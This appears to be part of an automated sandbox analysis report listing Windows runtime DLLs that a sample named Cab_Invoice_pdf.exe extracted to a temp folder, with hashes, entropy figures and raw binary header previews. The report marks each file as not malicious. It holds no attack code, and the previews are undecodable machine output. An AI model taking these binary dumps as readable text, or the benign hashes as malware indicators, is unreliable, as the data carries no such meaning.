                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-heap-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.174986589968396
                          Encrypted:false
                          SSDEEP:192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
                          MD5:2EA3901D7B50BF6071EC8732371B821C
                          SHA1:E7BE926F0F7D842271F7EDC7A4989544F4477DA7
                          SHA-256:44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
                          SHA-512:6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-interlocked-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17856
                          Entropy (8bit):7.076803035880586
                          Encrypted:false
                          SSDEEP:192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
                          MD5:D97A1CB141C6806F0101A5ED2673A63D
                          SHA1:D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
                          SHA-256:DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
                          SHA-512:0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-libraryloader-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.131154779640255
                          Encrypted:false
                          SSDEEP:384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
                          MD5:D0873E21721D04E20B6FFB038ACCF2F1
                          SHA1:9E39E505D80D67B347B19A349A1532746C1F7F88
                          SHA-256:BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
                          SHA-512:4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....u*l...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....u*l........A...T...T........u*l........d................u*l....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............u*l....................(...p...........R...}...............*...Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-localization-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.089032314841867
                          Encrypted:false
                          SSDEEP:384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
                          MD5:EFF11130BFE0D9C90C0026BF2FB219AE
                          SHA1:CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
                          SHA-256:03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
                          SHA-512:8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-memory-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.101895292899441
                          Encrypted:false
                          SSDEEP:384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
                          MD5:D500D9E24F33933956DF0E26F087FD91
                          SHA1:6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
                          SHA-256:BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
                          SHA-512:C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...|...................=...................................api-ms-win-core-memory-l1-1-0.dl
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-namedpipe-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.16337963516533
                          Encrypted:false
                          SSDEEP:192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
                          MD5:6F6796D1278670CCE6E2D85199623E27
                          SHA1:8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
                          SHA-256:C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
                          SHA-512:6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L... ..............!......................... ...............................0.......-....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.... ...........=...T...T....... ...........d............... .......................RSDS...IK..XM.&......api-ms-win-core-namedpipe-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................ .......................(...P...x...............:...w...............O...y...............&...W...............=...j.......................api-ms-win-core-namedpipe-l1-1-0.dll.ConnectNamedPipe.kernel32.ConnectNamedPipe.CreateNamedP
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processenvironment-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.073730829887072
                          Encrypted:false
                          SSDEEP:192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP
                          MD5:5F73A814936C8E7E4A2DFD68876143C8
                          SHA1:D960016C4F553E461AFB5B06B039A15D2E76135E
                          SHA-256:96898930FFB338DA45497BE019AE1ADCD63C5851141169D3023E53CE4C7A483E
                          SHA-512:77987906A9D248448FA23DB2A634869B47AE3EC81EA383A74634A8C09244C674ECF9AADCDE298E5996CAFBB8522EDE78D08AAA270FD43C66BEDE24115CDBDFED
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...).r............!......................... ...............................0.......:....@.............................G............ ..................0=..............T............................................................................text...G........................... ..`.rsrc........ ......................@..@....).r.........F...T...T.......).r.........d...............).r.....................RSDS.6..~x.......'......api-ms-win-core-processenvironment-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......G....edata... ..`....rsrc$01....` .......rsrc$02........).r.....................(...|.......B...............$...M...{...............P...................6...k.............../...(...e...............=...f...............8...q...............!...T............... ...........................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19392
                          Entropy (8bit):7.082421046253008
                          Encrypted:false
                          SSDEEP:384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv
                          MD5:A2D7D7711F9C0E3E065B2929FF342666
                          SHA1:A17B1F36E73B82EF9BFB831058F187535A550EB8
                          SHA-256:9DAB884071B1F7D7A167F9BEC94BA2BEE875E3365603FA29B31DE286C6A97A1D
                          SHA-512:D436B2192C4392A041E20506B2DFB593FE5797F1FDC2CDEB2D7958832C4C0A9E00D3AEA6AA1737D8A9773817FEADF47EE826A6B05FD75AB0BDAE984895C2C4EF
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......l.....@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@................B...T...T...................d.......................................RSDS..t........=j.......api-ms-win-core-processthreads-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................1...1...(...........K...x...............,...`...................C...q...............'...N...y..............."...I...{...............B...p...............,...c...............H...x...................9...S...p.......
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-processthreads-l1-1-1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.1156948849491055
                          Encrypted:false
                          SSDEEP:384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep
                          MD5:D0289835D97D103BAD0DD7B9637538A1
                          SHA1:8CEEBE1E9ABB0044808122557DE8AAB28AD14575
                          SHA-256:91EEB842973495DEB98CEF0377240D2F9C3D370AC4CF513FD215857E9F265A6A
                          SHA-512:97C47B2E1BFD45B905F51A282683434ED784BFB334B908BF5A47285F90201A23817FF91E21EA0B9CA5F6EE6B69ACAC252EEC55D895F942A94EDD88C4BFD2DAFD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....9.............!......................... ...............................0......k.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....9..........B...T...T........9..........d................9......................RSDS&.n....5..l....)....api-ms-win-core-processthreads-l1-1-1.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............9......................(...`...........-...l..........."...W...................N...................P...............F...q...............3...r...................................api-ms-win-core-processthreads-l1-1-1.dll.FlushInstr
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-profile-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17712
                          Entropy (8bit):7.187691342157284
                          Encrypted:false
                          SSDEEP:192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv
                          MD5:FEE0926AA1BF00F2BEC9DA5DB7B2DE56
                          SHA1:F5A4EB3D8AC8FB68AF716857629A43CD6BE63473
                          SHA-256:8EB5270FA99069709C846DB38BE743A1A80A42AA1A88776131F79E1D07CC411C
                          SHA-512:0958759A1C4A4126F80AA5CDD9DF0E18504198AEC6828C8CE8EB5F615AD33BF7EF0231B509ED6FD1304EEAB32878C5A649881901ABD26D05FD686F5EBEF2D1C3
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....&............!......................... ...............................0......0.....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....&.........;...T...T........&.........d................&.....................RSDS...O.""#.n....D:....api-ms-win-core-profile-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................&.....<...............(...0...8...w......._...........api-ms-win-core-profile-l1-1-0.dll.QueryPerformanceCounter.kernel32.QueryPerformanceCounter.QueryPerformanceFrequency.kernel32.QueryPerformanceFrequency....................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-rtlsupport-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):17720
                          Entropy (8bit):7.19694878324007
                          Encrypted:false
                          SSDEEP:384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y
                          MD5:FDBA0DB0A1652D86CD471EAA509E56EA
                          SHA1:3197CB45787D47BAC80223E3E98851E48A122EFA
                          SHA-256:2257FEA1E71F7058439B3727ED68EF048BD91DCACD64762EB5C64A9D49DF0B57
                          SHA-512:E5056D2BD34DC74FC5F35EA7AA8189AAA86569904B0013A7830314AE0E2763E95483FABDCBA93F6418FB447A4A74AB0F07712ED23F2E1B840E47A099B1E68E18
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......(...........!......................... ...............................0......}"....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.......(........>...T...T..........(........d..................(....................RSDS?.L.N.o.....=.......api-ms-win-core-rtlsupport-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................(....F...............(...4...@...~...........l.................api-ms-win-core-rtlsupport-l1-1-0.dll.RtlCaptureContext.ntdll.RtlCaptureContext.RtlCaptureStackBackTrace.ntdll.RtlCaptureStackBackTrace.RtlUnwind.ntdll.RtlUnwind.
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-string-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.137724132900032
                          Encrypted:false
                          SSDEEP:384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn
                          MD5:12CC7D8017023EF04EBDD28EF9558305
                          SHA1:F859A66009D1CAAE88BF36B569B63E1FBDAE9493
                          SHA-256:7670FDEDE524A485C13B11A7C878015E9B0D441B7D8EB15CA675AD6B9C9A7311
                          SHA-512:F62303D98EA7D0DDBE78E4AB4DB31AC283C3A6F56DBE5E3640CBCF8C06353A37776BF914CFE57BBB77FC94CCFA48FAC06E74E27A4333FBDD112554C646838929
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....R............!......................... ...............................0.......\....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......R.........:...T...T.........R.........d.................R.....................RSDS..D..a..1.f....7....api-ms-win-core-string-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02......................R.....x...............(...H...h...............)...O...x...........................>...i...........................api-ms-win-core-string-l1-1-0.dll.CompareStringEx.kernel32.CompareStringEx.CompareStringOrdinal.kernel32.Compare
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.04640581473745
                          Encrypted:false
                          SSDEEP:384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex
                          MD5:71AF7ED2A72267AAAD8564524903CFF6
                          SHA1:8A8437123DE5A22AB843ADC24A01AC06F48DB0D3
                          SHA-256:5DD4CCD63E6ED07CA3987AB5634CA4207D69C47C2544DFEFC41935617652820F
                          SHA-512:7EC2E0FEBC89263925C0352A2DE8CC13DA37172555C3AF9869F9DBB3D627DD1382D2ED3FDAD90594B3E3B0733F2D3CFDEC45BC713A4B7E85A09C164C3DFA3875
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......2...........!......................... ...............................0............@.............................V............ ..................8=..............T............................................................................text...V........................... ..`.rsrc........ ......................@..@.......2........9...T...T..........2........d..................2....................RSDS...z..C...+Q_.....api-ms-win-core-synch-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg.......V....edata... ..`....rsrc$01....` .......rsrc$02.......................2............)...)...(.......p.......1...c...................!...F...m...............$...X...........$...[.......................@...i...............!...Q.......................[...............7...........O...................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-synch-l1-2-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.138910839042951
                          Encrypted:false
                          SSDEEP:384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53
                          MD5:0D1AA99ED8069BA73CFD74B0FDDC7B3A
                          SHA1:BA1F5384072DF8AF5743F81FD02C98773B5ED147
                          SHA-256:30D99CE1D732F6C9CF82671E1D9088AA94E720382066B79175E2D16778A3DAD1
                          SHA-512:6B1A87B1C223B757E5A39486BE60F7DD2956BB505A235DF406BCF693C7DD440E1F6D65FFEF7FDE491371C682F4A8BB3FD4CE8D8E09A6992BB131ADDF11EF2BF9
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...X*uY...........!......................... ...............................0......3.....@.............................v............ ..................8=..............T............................................................................text...v........................... ..`.rsrc........ ......................@..@....X*uY........9...T...T.......X*uY........d...............X*uY....................RSDS.V..B...`..S3.....api-ms-win-core-synch-l1-2-0.pdb............T....rdata..T........rdata$zzzdbg.......v....edata... ..`....rsrc$01....` .......rsrc$02....................X*uY....................(...l...........R...................W...............&...b...............$...W.......6...w...............;...|...............H...................A.....................................api-ms-win-core-synch-
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-sysinfo-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19248
                          Entropy (8bit):7.072555805949365
                          Encrypted:false
                          SSDEEP:384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8
                          MD5:19A40AF040BD7ADD901AA967600259D9
                          SHA1:05B6322979B0B67526AE5CD6E820596CBE7393E4
                          SHA-256:4B704B36E1672AE02E697EFD1BF46F11B42D776550BA34A90CD189F6C5C61F92
                          SHA-512:5CC4D55350A808620A7E8A993A90E7D05B441DA24127A00B15F96AAE902E4538CA4FED5628D7072358E14681543FD750AD49877B75E790D201AB9BAFF6898C8D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....C=...........!......................... ...............................0............@.............................E............ ..................0=..............T............................................................................text...E........................... ..`.rsrc........ ......................@..@......C=........;...T...T.........C=........d.................C=....................RSDS....T.>eD.#|.../....api-ms-win-core-sysinfo-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......E....edata... ..`....rsrc$01....` .......rsrc$02......................C=....................(...........:...i...............N...................7...s...............+...M...r.............../...'...V...............:...k...................X............... ...?...d..............."...................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-timezone-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18224
                          Entropy (8bit):7.17450177544266
                          Encrypted:false
                          SSDEEP:384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu
                          MD5:BABF80608FD68A09656871EC8597296C
                          SHA1:33952578924B0376CA4AE6A10B8D4ED749D10688
                          SHA-256:24C9AA0B70E557A49DAC159C825A013A71A190DF5E7A837BFA047A06BBA59ECA
                          SHA-512:3FFFFD90800DE708D62978CA7B50FE9CE1E47839CDA11ED9E7723ACEC7AB5829FA901595868E4AB029CDFB12137CF8ECD7B685953330D0900F741C894B88257B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....Y.x...........!......................... ...............................0......}3....@.......................................... ..................0=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....Y.x........<...T...T........Y.x........d................Y.x....................RSDS.^.b. .t.H.a.......api-ms-win-core-timezone-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.....................Y.x....................(...L...p...........5...s...........+...i...................U...............I.........................api-ms-win-core-timezone-l1-1-0.dll.FileTimeToSystemTime.kernel32.FileTimeToSystemTime.GetDynamicTimeZ
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-core-util-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18232
                          Entropy (8bit):7.1007227686954275
                          Encrypted:false
                          SSDEEP:192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552
                          MD5:0F079489ABD2B16751CEB7447512A70D
                          SHA1:679DD712ED1C46FBD9BC8615598DA585D94D5D87
                          SHA-256:F7D450A0F59151BCEFB98D20FCAE35F76029DF57138002DB5651D1B6A33ADC86
                          SHA-512:92D64299EBDE83A4D7BE36F07F65DD868DA2765EB3B39F5128321AFF66ABD66171C7542E06272CB958901D403CCF69ED716259E0556EE983D2973FAA03C55D3E
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....f............!......................... ...............................0......`k....@.............................9............ ..................8=..............T............................................................................text...)........................... ..`.rsrc........ ......................@..@......f.........8...T...T.........f.........d.................f.....................RSDS*...$.L.Rm..l.....api-ms-win-core-util-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg.......9....edata... ..`....rsrc$01....` .......rsrc$02..........f.....J...................,...@...o...................j...}.........................api-ms-win-core-util-l1-1-0.dll.Beep.kernel32.Beep.DecodePointer.kernel32.DecodePointer.DecodeSystemPointer.kernel32.DecodeSystemPointer.EncodePointer.kernel3
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-conio-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.088693688879585
                          Encrypted:false
                          SSDEEP:384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV
                          MD5:6EA692F862BDEB446E649E4B2893E36F
                          SHA1:84FCEAE03D28FF1907048ACEE7EAE7E45BAAF2BD
                          SHA-256:9CA21763C528584BDB4EFEBE914FAAF792C9D7360677C87E93BD7BA7BB4367F2
                          SHA-512:9661C135F50000E0018B3E5C119515CFE977B2F5F88B0F5715E29DF10517B196C81694D074398C99A572A971EC843B3676D6A831714AB632645ED25959D5E3E7
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v..............................8...d...d..................d......................................RSDS....<....2..u....api-ms-win-crt-conio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...............T...............(.......................>...w.........../...W...p...........................,...L...l.......................,...L...m...............t...........'...^...............P...g...........................$...=...
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-convert-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22328
                          Entropy (8bit):6.929204936143068
                          Encrypted:false
                          SSDEEP:384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp
                          MD5:72E28C902CD947F9A3425B19AC5A64BD
                          SHA1:9B97F7A43D43CB0F1B87FC75FEF7D9EEEA11E6F7
                          SHA-256:3CC1377D495260C380E8D225E5EE889CBB2ED22E79862D4278CFA898E58E44D1
                          SHA-512:58AB6FEDCE2F8EE0970894273886CB20B10D92979B21CDA97AE0C41D0676CC0CD90691C58B223BCE5F338E0718D1716E6CE59A106901FE9706F85C3ACF7855FF
                          Malicious:false
                          Reputation:unknown
